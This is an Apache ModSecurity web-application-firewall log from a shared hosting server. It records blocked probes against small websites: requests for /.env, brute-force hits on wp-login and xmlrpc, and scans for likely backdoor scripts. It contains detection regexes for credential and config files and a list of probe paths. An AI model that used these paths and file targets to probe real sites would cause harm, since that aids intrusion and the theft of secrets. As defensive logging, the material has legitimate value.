[Tue May 26 16:34:52.205853 2026] [security2:error] [pid 808625:tid 808836] [client 103.215.74.72:17120] ModSecurity: Access denied with code 406 (phase 2). Match of "rx [.](png|jpeg|jpg|tiff|bmp|gif|webp|heif|svg|raw|ico|ppm|pgm|pbm|exr|nef|dng|cr2|orf|arw|pef|sr2|raf|kdc|indd|ai|eps|pdf|psd|tga|hdr|j2k|jpf|jp2|pspimage|cut|icns|webm|bpg|avif|heic|fpx|hdri|hdp|yuv|sgi|xpm|svgz)$" against "REQUEST_FILENAME" required. [file "/opt/mod_security/hg_rules.conf"] [line "842"] [id "900095"] [msg "Bad UA :: Fake Mozilla Agent"] [hostname "mosykay.com"] [uri "/action"] [unique_id "ahV-VDEl_SBaWibfDmpfgAAAAFE"]
[Tue May 26 16:34:52.205873 2026] [security2:error] [pid 808625:tid 808785] [client 103.215.74.72:17106] ModSecurity: Access denied with code 406 (phase 2). Match of "rx [.](png|jpeg|jpg|tiff|bmp|gif|webp|heif|svg|raw|ico|ppm|pgm|pbm|exr|nef|dng|cr2|orf|arw|pef|sr2|raf|kdc|indd|ai|eps|pdf|psd|tga|hdr|j2k|jpf|jp2|pspimage|cut|icns|webm|bpg|avif|heic|fpx|hdri|hdp|yuv|sgi|xpm|svgz)$" against "REQUEST_FILENAME" required. [file "/opt/mod_security/hg_rules.conf"] [line "842"] [id "900095"] [msg "Bad UA :: Fake Mozilla Agent"] [hostname "mosykay.com"] [uri "/action"] [unique_id "ahV-VDEl_SBaWibfDmpfgQAAAB4"]
[Tue May 26 16:34:52.205901 2026] [security2:error] [pid 808625:tid 808772] [client 103.215.74.72:17152] ModSecurity: Access denied with code 406 (phase 2). Match of "rx [.](png|jpeg|jpg|tiff|bmp|gif|webp|heif|svg|raw|ico|ppm|pgm|pbm|exr|nef|dng|cr2|orf|arw|pef|sr2|raf|kdc|indd|ai|eps|pdf|psd|tga|hdr|j2k|jpf|jp2|pspimage|cut|icns|webm|bpg|avif|heic|fpx|hdri|hdp|yuv|sgi|xpm|svgz)$" against "REQUEST_FILENAME" required. [file "/opt/mod_security/hg_rules.conf"] [line "842"] [id "900095"] [msg "Bad UA :: Fake Mozilla Agent"] [hostname "mosykay.com"] [uri "/action"] [unique_id "ahV-VDEl_SBaWibfDmpfhAAAABE"]
[Tue May 26 16:34:52.205953 2026] [security2:error] [pid 808625:tid 808870] [client 103.215.74.72:17128] ModSecurity: Access denied with code 406 (phase 2). Match of "rx [.](png|jpeg|jpg|tiff|bmp|gif|webp|heif|svg|raw|ico|ppm|pgm|pbm|exr|nef|dng|cr2|orf|arw|pef|sr2|raf|kdc|indd|ai|eps|pdf|psd|tga|hdr|j2k|jpf|jp2|pspimage|cut|icns|webm|bpg|avif|heic|fpx|hdri|hdp|yuv|sgi|xpm|svgz)$" against "REQUEST_FILENAME" required. [file "/opt/mod_security/hg_rules.conf"] [line "842"] [id "900095"] [msg "Bad UA :: Fake Mozilla Agent"] [hostname "mosykay.com"] [uri "/action"] [unique_id "ahV-VDEl_SBaWibfDmpfgwAAAHM"]
[Tue May 26 16:34:52.391381 2026] [security2:error] [pid 808625:tid 808784] [client 188.243.241.30:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahV-VDEl_SBaWibfDmpfigAAAB0"]
[Tue May 26 16:34:52.532397 2026] [security2:error] [pid 808625:tid 808818] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV-UzEl_SBaWibfDmpfeAAAAD8"]
[Tue May 26 16:34:52.646714 2026] [security2:error] [pid 808625:tid 808819] [client 188.243.241.30:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahV-VDEl_SBaWibfDmpfkAAAAEA"]
[Tue May 26 16:34:52.903639 2026] [security2:error] [pid 808625:tid 808771] [client 188.243.241.30:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahV-VDEl_SBaWibfDmpflAAAABA"]
[Tue May 26 16:34:53.149589 2026] [security2:error] [pid 808625:tid 808763] [client 188.243.241.30:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahV-VTEl_SBaWibfDmpfnQAAAAg"]
[Tue May 26 16:34:53.805248 2026] [security2:error] [pid 808625:tid 808774] [client 188.243.241.30:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahV-VTEl_SBaWibfDmpfsQAAABM"]
[Tue May 26 16:34:54.066942 2026] [security2:error] [pid 808625:tid 808880] [client 188.243.241.30:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahV-VjEl_SBaWibfDmpfvAAAAH0"]
[Tue May 26 16:34:54.324107 2026] [security2:error] [pid 808625:tid 808811] [client 188.243.241.30:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahV-VjEl_SBaWibfDmpfxAAAADg"]
[Tue May 26 16:34:54.582307 2026] [security2:error] [pid 808625:tid 808767] [client 188.243.241.30:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahV-VjEl_SBaWibfDmpfzAAAAAw"]
[Tue May 26 16:34:54.824697 2026] [security2:error] [pid 808625:tid 808862] [client 57.141.2.8:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV-VjEl_SBaWibfDmpfxQAAAGs"]
[Tue May 26 16:34:54.875047 2026] [security2:error] [pid 808625:tid 808842] [client 188.243.241.30:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahV-VjEl_SBaWibfDmpf0gAAAFc"]
[Tue May 26 16:34:55.137978 2026] [security2:error] [pid 808625:tid 808797] [client 188.243.241.30:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahV-VzEl_SBaWibfDmpf3wAAACo"]
[Tue May 26 16:34:56.391908 2026] [security2:error] [pid 808625:tid 808789] [client 14.190.250.125:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV-VzEl_SBaWibfDmpf6wAAACI"]
[Tue May 26 16:34:57.172455 2026] [security2:error] [pid 808625:tid 808769] [client 57.141.2.57:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV-WDEl_SBaWibfDmpf_QAAAA4"]
[Tue May 26 16:34:58.940000 2026] [security2:error] [pid 808625:tid 808764] [client 57.141.2.8:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV-WjEl_SBaWibfDmpgHQAAAAk"]
[Tue May 26 16:35:01.448632 2026] [security2:error] [pid 808625:tid 808790] [client 57.141.2.7:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV-XTEl_SBaWibfDmpgRwAAACM"]
[Tue May 26 16:35:03.548786 2026] [security2:error] [pid 808625:tid 808795] [client 117.198.37.168:58257] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 168.37.198.117.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV-XzEl_SBaWibfDmpggwAAACg"]
[Tue May 26 16:35:03.548923 2026] [security2:error] [pid 808625:tid 808795] [client 117.198.37.168:58257] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV-XzEl_SBaWibfDmpggwAAACg"]
[Tue May 26 16:35:03.686463 2026] [security2:error] [pid 808625:tid 808810] [client 57.141.2.39:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV-XjEl_SBaWibfDmpgdAAAADc"]
[Tue May 26 16:35:05.193394 2026] [security2:error] [pid 808625:tid 808816] [client 57.141.2.16:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV-YDEl_SBaWibfDmpglQAAAD0"]
[Tue May 26 16:35:05.253240 2026] [security2:error] [pid 808625:tid 808779] [client 114.119.129.110:52869] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.yourstorybag.com"] [uri "/contact/"] [unique_id "ahV-YTEl_SBaWibfDmpgowAAABg"], referer: https://www.yourstorybag.com/tellers-tales-falak-randerian/
[Tue May 26 16:35:05.901224 2026] [security2:error] [pid 808625:tid 808863] [client 176.65.139.233:19294] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "gldmarsa.glorodavionics.com"] [uri "/.env"] [unique_id "ahV-YTEl_SBaWibfDmpgrgAAAGw"]
[Tue May 26 16:35:05.905145 2026] [security2:error] [pid 808625:tid 808844] [client 176.65.139.231:18780] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "glorodrc.glorodavionics.com"] [uri "/.env"] [unique_id "ahV-YTEl_SBaWibfDmpgsQAAAFk"]
[Tue May 26 16:35:05.905858 2026] [security2:error] [pid 808625:tid 808767] [client 176.65.139.231:18794] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "glorodbalsa.glorodavionics.com"] [uri "/.env"] [unique_id "ahV-YTEl_SBaWibfDmpgsgAAAAw"]
[Tue May 26 16:35:05.908506 2026] [security2:error] [pid 808625:tid 808756] [client 176.65.139.233:19310] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "juniorwoodies.glorodavionics.com"] [uri "/.env"] [unique_id "ahV-YTEl_SBaWibfDmpgswAAAAE"]
[Tue May 26 16:35:05.924330 2026] [security2:error] [pid 808625:tid 808676] [remote 46.101.75.237:45660] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 237.75.101.46.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "veganfoodindia.com"] [uri "/wp-login.php"] [unique_id "ahV-YTEl_SBaWibfDmpgqgAAZDI"]
[Tue May 26 16:35:07.270332 2026] [security2:error] [pid 808625:tid 808799] [client 57.141.2.13:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV-YjEl_SBaWibfDmpgwAAAACw"]
[Tue May 26 16:35:07.493438 2026] [security2:error] [pid 808625:tid 808828] [client 176.65.139.232:59768] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "carppaintings.glorodavionics.com"] [uri "/.env"] [unique_id "ahV-YzEl_SBaWibfDmpg2wAAAEk"]
[Tue May 26 16:35:08.120507 2026] [security2:error] [pid 808625:tid 808679] [remote 74.7.241.15:57144] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 15.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.lodgerajasabai212.svijaykumar.in"] [uri "/l212-calendar.php"] [unique_id "ahV-ZDEl_SBaWibfDmpg5gAAATU"], referer: https://www.lodgerajasabai212.svijaykumar.in/
[Tue May 26 16:35:08.378879 2026] [security2:error] [pid 808625:tid 808760] [client 130.131.224.225:63277] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 225.224.131.130.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "btc-bingo.com.md-74.webhostbox.net"] [uri "/wp-content/plugins/hellopress/wp_filemanager.php"] [unique_id "ahV-ZDEl_SBaWibfDmpg6gAAAAU"]
[Tue May 26 16:35:08.379005 2026] [security2:error] [pid 808625:tid 808760] [client 130.131.224.225:63277] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "btc-bingo.com.md-74.webhostbox.net"] [uri "/wp-content/plugins/hellopress/wp_filemanager.php"] [unique_id "ahV-ZDEl_SBaWibfDmpg6gAAAAU"]
[Tue May 26 16:35:08.551088 2026] [security2:error] [pid 808625:tid 808861] [client 130.131.224.225:63895] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 225.224.131.130.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "btc-bingo.com.md-74.webhostbox.net"] [uri "/ff.php"] [unique_id "ahV-ZDEl_SBaWibfDmpg7gAAAGo"]
[Tue May 26 16:35:08.551227 2026] [security2:error] [pid 808625:tid 808861] [client 130.131.224.225:63895] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "btc-bingo.com.md-74.webhostbox.net"] [uri "/ff.php"] [unique_id "ahV-ZDEl_SBaWibfDmpg7gAAAGo"]
[Tue May 26 16:35:08.699683 2026] [security2:error] [pid 808625:tid 808822] [client 130.131.224.225:63890] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 225.224.131.130.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "btc-bingo.com.md-74.webhostbox.net"] [uri "/x.php"] [unique_id "ahV-ZDEl_SBaWibfDmpg9gAAAEM"]
[Tue May 26 16:35:08.699811 2026] [security2:error] [pid 808625:tid 808822] [client 130.131.224.225:63890] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "btc-bingo.com.md-74.webhostbox.net"] [uri "/x.php"] [unique_id "ahV-ZDEl_SBaWibfDmpg9gAAAEM"]
[Tue May 26 16:35:08.781738 2026] [security2:error] [pid 808625:tid 808838] [client 20.151.117.104:35826] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "freeworkzone.com.md-74.webhostbox.net"] [uri "/wp-content/plugins/hellopress/wp_filemanager.php"] [unique_id "ahV-ZDEl_SBaWibfDmpg-QAAAFM"]
[Tue May 26 16:35:08.781879 2026] [security2:error] [pid 808625:tid 808838] [client 20.151.117.104:35826] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "freeworkzone.com.md-74.webhostbox.net"] [uri "/wp-content/plugins/hellopress/wp_filemanager.php"] [unique_id "ahV-ZDEl_SBaWibfDmpg-QAAAFM"]
[Tue May 26 16:35:08.831551 2026] [security2:error] [pid 808625:tid 808881] [client 130.131.224.225:63914] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 225.224.131.130.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "btc-bingo.com.md-74.webhostbox.net"] [uri "/tires.php"] [unique_id "ahV-ZDEl_SBaWibfDmpg-wAAAH4"]
[Tue May 26 16:35:08.831669 2026] [security2:error] [pid 808625:tid 808881] [client 130.131.224.225:63914] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "btc-bingo.com.md-74.webhostbox.net"] [uri "/tires.php"] [unique_id "ahV-ZDEl_SBaWibfDmpg-wAAAH4"]
[Tue May 26 16:35:08.926053 2026] [security2:error] [pid 808625:tid 808769] [client 20.151.117.104:59375] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "freeworkzone.com.md-74.webhostbox.net"] [uri "/admin.php"] [unique_id "ahV-ZDEl_SBaWibfDmphAgAAAA4"]
[Tue May 26 16:35:08.926201 2026] [security2:error] [pid 808625:tid 808769] [client 20.151.117.104:59375] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "freeworkzone.com.md-74.webhostbox.net"] [uri "/admin.php"] [unique_id "ahV-ZDEl_SBaWibfDmphAgAAAA4"]
[Tue May 26 16:35:08.964733 2026] [security2:error] [pid 808625:tid 808774] [client 130.131.224.225:62684] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 225.224.131.130.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "btc-bingo.com.md-74.webhostbox.net"] [uri "/wp-block.php"] [unique_id "ahV-ZDEl_SBaWibfDmphAwAAABM"]
[Tue May 26 16:35:08.964894 2026] [security2:error] [pid 808625:tid 808774] [client 130.131.224.225:62684] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "btc-bingo.com.md-74.webhostbox.net"] [uri "/wp-block.php"] [unique_id "ahV-ZDEl_SBaWibfDmphAwAAABM"]
[Tue May 26 16:35:09.075212 2026] [security2:error] [pid 808625:tid 808826] [client 20.151.117.104:31173] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "freeworkzone.com.md-74.webhostbox.net"] [uri "/inputs.php"] [unique_id "ahV-ZTEl_SBaWibfDmphBAAAAEc"]
[Tue May 26 16:35:09.075334 2026] [security2:error] [pid 808625:tid 808826] [client 20.151.117.104:31173] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "freeworkzone.com.md-74.webhostbox.net"] [uri "/inputs.php"] [unique_id "ahV-ZTEl_SBaWibfDmphBAAAAEc"]
[Tue May 26 16:35:09.219895 2026] [security2:error] [pid 808625:tid 808799] [client 20.151.117.104:59347] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "freeworkzone.com.md-74.webhostbox.net"] [uri "/file.php"] [unique_id "ahV-ZTEl_SBaWibfDmphCQAAACw"]
[Tue May 26 16:35:09.220032 2026] [security2:error] [pid 808625:tid 808799] [client 20.151.117.104:59347] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "freeworkzone.com.md-74.webhostbox.net"] [uri "/file.php"] [unique_id "ahV-ZTEl_SBaWibfDmphCQAAACw"]
[Tue May 26 16:35:09.237919 2026] [security2:error] [pid 808625:tid 808825] [client 130.131.224.225:63956] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 225.224.131.130.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "btc-bingo.com.md-74.webhostbox.net"] [uri "/wp-der.php"] [unique_id "ahV-ZTEl_SBaWibfDmphCgAAAEY"]
[Tue May 26 16:35:09.238031 2026] [security2:error] [pid 808625:tid 808825] [client 130.131.224.225:63956] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "btc-bingo.com.md-74.webhostbox.net"] [uri "/wp-der.php"] [unique_id "ahV-ZTEl_SBaWibfDmphCgAAAEY"]
[Tue May 26 16:35:09.362950 2026] [security2:error] [pid 808625:tid 808828] [client 20.151.117.104:22324] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "freeworkzone.com.md-74.webhostbox.net"] [uri "/ms-edit.php"] [unique_id "ahV-ZTEl_SBaWibfDmphDQAAAEk"]
[Tue May 26 16:35:09.363090 2026] [security2:error] [pid 808625:tid 808828] [client 20.151.117.104:22324] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "freeworkzone.com.md-74.webhostbox.net"] [uri "/ms-edit.php"] [unique_id "ahV-ZTEl_SBaWibfDmphDQAAAEk"]
[Tue May 26 16:35:09.427993 2026] [security2:error] [pid 808625:tid 808802] [client 130.131.224.225:63264] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 225.224.131.130.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "btc-bingo.com.md-74.webhostbox.net"] [uri "/ah25.php"] [unique_id "ahV-ZTEl_SBaWibfDmphEQAAAC8"]
[Tue May 26 16:35:09.428097 2026] [security2:error] [pid 808625:tid 808802] [client 130.131.224.225:63264] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "btc-bingo.com.md-74.webhostbox.net"] [uri "/ah25.php"] [unique_id "ahV-ZTEl_SBaWibfDmphEQAAAC8"]
[Tue May 26 16:35:09.509473 2026] [security2:error] [pid 808625:tid 808836] [client 20.151.117.104:22331] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "freeworkzone.com.md-74.webhostbox.net"] [uri "/simple.php"] [unique_id "ahV-ZTEl_SBaWibfDmphEgAAAFE"]
